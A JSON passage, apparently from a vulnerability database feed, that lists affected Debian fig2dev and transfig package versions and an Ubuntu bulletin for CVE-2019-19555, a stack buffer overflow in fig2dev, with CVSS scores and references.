"ppc64el", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_ppc64el.deb", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "operator": "lt", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "arch": "arm64", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_arm64.deb", "packageName": "fig2dev-dbgsym"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u1_s390x.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "s390x", "operator": "lt", "packageName": "fig2dev"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_mips.deb", "operator": "lt", "arch": "mips", "packageName": "fig2dev-dbgsym"}, {"arch": "armel", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u1_armel.deb", "operator": "lt", "packageName": "fig2dev"}, {"packageVersion": "3.2.7a-5+deb10u2", "arch": "armel", "OS": "Debian", "OSVersion": "10", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_armel.deb", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "arch": "mipsel", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_mipsel.deb", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_mips.deb", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "arch": "mips", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_ppc64el.deb", "arch": "ppc64el", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"OSVersion": "9", "arch": "all", "packageFilename": "transfig_3.2.6a-2+deb9u2_all.deb", "OS": "Debian", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "transfig"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "arch": "arm64", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u1_arm64.deb", "operator": "lt", "packageName": "fig2dev"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "packageFilename": "fig2dev_3.2.7a-5+deb10u1_ppc64el.deb", "OSVersion": "10", "arch": "ppc64el", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_mips.deb", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "arch": "mips", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_mipsel.deb", "arch": "mipsel", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_s390x.deb", "OS": "Debian", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_s390x.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "arch": "s390x", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_mipsel.deb", "OS": "Debian", "arch": "mipsel", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u2_mips64el.deb", "packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "arch": "mips64el", "operator": "lt", "packageName": "fig2dev"}, {"packageVersion": "3.2.7a-5+deb10u2", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_s390x.deb", "OS": "Debian", "OSVersion": "10", "arch": "s390x", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_armhf.deb", "arch": "armhf", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"arch": "all", "OS": "Debian", "packageVersion": "1:3.2.7a-5+deb10u2", "OSVersion": "10", "packageFilename": "fig2dev_1:3.2.7a-5+deb10u2_all.deb", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_s390x.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "arch": "s390x", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_s390x.deb", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_mips.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "operator": "lt", "arch": "mips", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_arm64.deb", "arch": "arm64", "operator": "lt", "packageName": "fig2dev"}, {"packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_armel.deb", "arch": "armel", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_i386.deb", "packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "arch": "i386", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_ppc64el.deb", "OSVersion": "10", "arch": "ppc64el", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"arch": "all", "packageVersion": "1:3.2.5.e-4+deb8u2", "OS": "Debian", "OSVersion": "8", "packageFilename": "transfig_1:3.2.5.e-4+deb8u2_all.deb", "operator": "lt", "packageName": "transfig"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u1_mips.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "operator": "lt", "arch": "mips", "packageName": "fig2dev"}, {"packageVersion": "3.2.7a-5+deb10u2", "operator": "lt", "OS": "Debian", "OSVersion": "10", "arch": "armhf", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_armhf.deb", "packageName": "fig2dev-dbgsym"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "i386", "operator": "lt", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_i386.deb", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "arch": "i386", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_i386.deb", "packageName": "fig2dev"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u1_amd64.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "operator": "lt", "arch": "amd64", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_amd64.deb", "operator": "lt", "arch": "amd64", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_amd64.deb", "operator": "lt", "arch": "amd64", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_i386.deb", "arch": "i386", "operator": "lt", "packageName": "fig2dev"}, {"packageVersion": "1:3.2.7a-5+deb10u1", "arch": "all", "OS": "Debian", "OSVersion": "10", "operator": "lt", "packageFilename": "fig2dev_1:3.2.7a-5+deb10u1_all.deb", "packageName": "fig2dev"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u1_mipsel.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "mipsel", "operator": "lt", "packageName": "fig2dev"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_mips64el.deb", "arch": "mips64el", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_amd64.deb", "packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "operator": "lt", "arch": "amd64", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_i386.deb", "arch": "i386", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_amd64.deb", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "arch": "amd64", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "arch": "all", "OS": "Debian", "operator": "lt", "packageVersion": "1:3.2.6a-2+deb9u2", "packageFilename": "fig2dev_1:3.2.6a-2+deb9u2_all.deb", "packageName": "fig2dev"}, {"OSVersion": "9", "arch": "all", "packageFilename": "transfig_3.2.6a-2+deb9u3_all.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "operator": "lt", "packageName": "transfig"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "arch": "arm64", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_arm64.deb", "OSVersion": "10", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "i386", "operator": "lt", "packageFilename": "fig2dev_3.2.7a-5+deb10u1_i386.deb", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_ppc64el.deb", "packageVersion": "3.2.6a-2+deb9u3", "arch": "ppc64el", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "arch": "armel", "OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_armel.deb", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_mips64el.deb", "OS": "Debian", "arch": "mips64el", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "arch": "armel", "OS": "Debian", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_armel.deb", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u1_armhf.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "armhf", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_mips64el.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "arch": "mips64el", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_i386.deb", "arch": "i386", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"arch": "armel", "OS": "Debian", "packageFilename": "transfig_3.2.5.e-4+deb8u2_armel.deb", "OSVersion": "8", "operator": "lt", "packageVersion": "3.2.5.e-4+deb8u2", "packageName": "transfig"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_mipsel.deb", "OSVersion": "10", "arch": "mipsel", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OS": "Debian", "OSVersion": "8", "arch": "i386", "operator": "lt", "packageVersion": "3.2.5.e-4+deb8u2", "packageFilename": "transfig_3.2.5.e-4+deb8u2_i386.deb", "packageName": "transfig"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_mips.deb", "operator": "lt", "arch": "mips", "packageName": "fig2dev"}, {"OS": "Debian", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_mips64el.deb", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "mips64el", "operator": "lt", "packageName": "fig2dev-dbgsym"}], "_object_type": "robots.models.debian.DebianBulletin", "_object_types": ["robots.models.debian.DebianBulletin", "robots.models.base.Bulletin"]}], "ubuntucve": [{"id": "UB:CVE-2019-19555", "hash": "49e53406af20c4f5d8b6b034b716c22a", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer\noverflow because of an incorrect sscanf.\n\n#### Bugs\n\n * <https://sourceforge.net/p/mcj/tickets/55/>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946176>\n", "published": "2019-12-04T00:00:00", "modified": "2019-12-04T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2019-19555", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://nvd.nist.gov/vuln/detail/CVE-2019-19555", "https://launchpad.net/bugs/cve/CVE-2019-19555", "https://security-tracker.debian.org/tracker/CVE-2019-19555"], "cvelist": ["CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-07-30T22:00:21", "history": [{"bulletin": {"id": "UB:CVE-2019-19555", "hash": "fb30400f73d7f8808d2152c6be62626e", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer\noverflow because of an incorrect sscanf.\n\n#### Bugs\n\n * <https://sourceforge.net/p/mcj/tickets/55/>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946176>\n", "published": "2019-12-04T00:00:00", "modified": "2019-12-04T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2019-19555", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://nvd.nist.gov/vuln/detail/CVE-2019-19555", "https://launchpad.net/bugs/cve/CVE-2019-19555", "https://security-tracker.debian.org/tracker/CVE-2019-19555"], "cvelist": ["CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-06-30T21:46:49", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19555"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2073.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-2454-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1"]}], "modified": "2021-06-30T21:46:49", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-06-30T21:46:49", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1:3.2.7b-2", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "fig2dev"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "fig2dev"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "transfig"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "transfig"}], "bugs": ["https://sourceforge.net/p/mcj/tickets/55/", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946176"]}, "lastseen": "2021-06-30T21:46:49", "differentElements": ["cvss2", "cvss3"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-19555"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "nessus", "idList": ["OPENSUSE-2021-1143.NASL", "SUSE_SU-2021-14823-1.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2021-1318.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1143-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2021:2454-1"]}], "modified": "2021-07-30T22:00:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-30T22:00:21", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1:3.2.7b-2", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "fig2dev"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "fig2dev"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "transfig"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "transfig"}], "bugs": ["https://sourceforge.net/p/mcj/tickets/55/", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946176"], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}]}
